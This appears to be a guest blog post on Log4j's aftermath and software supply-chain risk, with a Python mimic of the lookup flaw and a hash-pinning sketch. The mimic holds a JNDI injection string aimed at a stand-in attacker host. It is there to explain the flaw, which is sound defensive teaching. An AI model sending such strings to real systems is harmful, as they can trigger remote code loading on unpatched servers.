What’s Next After Log4j?

This guest post was contributed by Lou Steinberg, founder and Managing Partner of CTM Insights, a cybersecurity research lab and incubator with eight operating cyber companies. Prior to CTM, Steinberg served for six years as CTO of TD Ameritrade, where he was responsible for technology innovation, platform architecture, engineering, operations, risk management, and cybersecurity.

It's not over 'til it's over. And it's not over.

When the Log4j vulnerability was first announced, there was a mad scramble. Millions of servers worldwide use Log4j as part of their plumbing. At-risk systems had to be found and patched before they could be exploited by attackers. And attack they did. Log4j created a relatively easy way to take control of systems with valuable data, so bad actors wrote tools to scan the internet looking for unpatched targets.
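Why was it so easy? Vulnerable Log4j versions expanded "${...}" lookup tokens anywhere in a logged message, even when that message contained attacker-supplied text. The sketch below is a simplified Python mimic of that expansion step, not real Log4j code; the `expand_lookups` and `unsafe_resolver` names are hypothetical, and a real vulnerable resolver contacted the attacker's URL (e.g. `${jndi:ldap://...}`) and could load remote code.

```python
import re

# Simplified mimic of Log4j-style "${scheme:value}" lookup expansion.
# Illustrative only -- real Log4j resolved tokens like ${jndi:ldap://...}
# by actually contacting the remote server.
LOOKUP = re.compile(r"\$\{(\w+):([^}]*)\}")

def expand_lookups(message, resolver):
    # Every "${scheme:value}" token in the logged string is handed to the
    # resolver. This is the dangerous step when the string came from a user.
    return LOOKUP.sub(lambda m: resolver(m.group(1), m.group(2)), message)

def unsafe_resolver(scheme, value):
    # A vulnerable resolver would fetch (and potentially execute) remote
    # content here; we just mark that the lookup fired.
    return f"<resolved {scheme}:{value}>"

# The attacker controls a header; the application only meant to log it.
user_agent = "${jndi:ldap://attacker.example/x}"
print(expand_lookups(f"request from {user_agent}", unsafe_resolver))
```

The fix in patched Log4j versions was, in effect, to stop performing this kind of expansion on logged data.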

This is called a "zero-day", where defenders have zero days to prepare. Attackers and defenders engage: whoever finds a vulnerable system first wins it.

Here's the next problem: the race may be (largely) over, but only the attackers know the score. Smart attackers didn't stop to mine each system they compromised. They did just enough to put in backdoor accounts and access so they could come back later, then kept hunting for more systems to take over. Defenders could come in and patch the Log4j vulnerability later, but that's like locking your door with the burglar already inside. If the attackers were sloppy and left clues (the digital break-in equivalent of a smashed window and broken glass on the ground), we might find them later. If they were stealthy, we won't. As a result, it's hard to know how many systems are already compromised. It may take months or even years before we know whether most critical systems were patched in time.

And that's just Log4j. Chances are good there's another zero-day behind this, and another behind that. Why? Because modern software is assembled from lots of "components" that have one thing in common: someone else wrote them. This is what's called a "software supply chain", where a finished product is built from suppliers' parts. If a commonly used part is defective, it can affect a lot of different products that incorporated it.

Remember the Takata airbag recall in 2014? Defective airbag components were put in 47 million cars made by 19 different automakers. One commonly included component affected many products. The same happens with software, but less randomly. We have attackers actively trying to insert malicious code into components so they can later exploit the finished products. A user installs software or an update from a trusted provider and unknowingly installs vulnerabilities and malware, as happened with SolarWinds.

Worse still, many of the included components are "black boxes" -- software providers have little ability to see what's inside. Imagine making a cake, but before you start someone has the option of secretly changing any of the ingredients you buy. Now imagine you are competing against them for a $1M best-cake prize, so they have an incentive to want your cake to fail. That's how we make software. Sometimes we use a defective ingredient, and sometimes the ingredients have been tampered with. We try to keep the bad actors out of our kitchen, but can't be certain the components we use aren't compromised.
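One partial defense against tampered ingredients is to pin a cryptographic digest for each component and refuse any download that doesn't match. A minimal sketch, with a hypothetical component name and a pinned hash stood in by a placeholder (real pins come from the supplier, a signed manifest, or a lockfile):

```python
import hashlib

# Hypothetical pin list: component name -> expected SHA-256 digest.
# In practice these digests come from the supplier or a signed lockfile.
PINNED = {
    "logging-lib-2.17.1.jar": hashlib.sha256(b"known-good bytes").hexdigest(),
}

def verify_component(name, data):
    """Return True only if the downloaded bytes match the pinned digest."""
    expected = PINNED.get(name)
    return expected is not None and hashlib.sha256(data).hexdigest() == expected
```

Pinning catches tampering in transit or in a compromised mirror; it can't help when the malicious code was inserted upstream before the "known-good" version was published, which is why it's only one layer of defense.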

Complexity is the enemy of security, and dependencies create complexity. With motivated attackers and millions of components, our applications and services are exposed. Get ready: this will happen again.
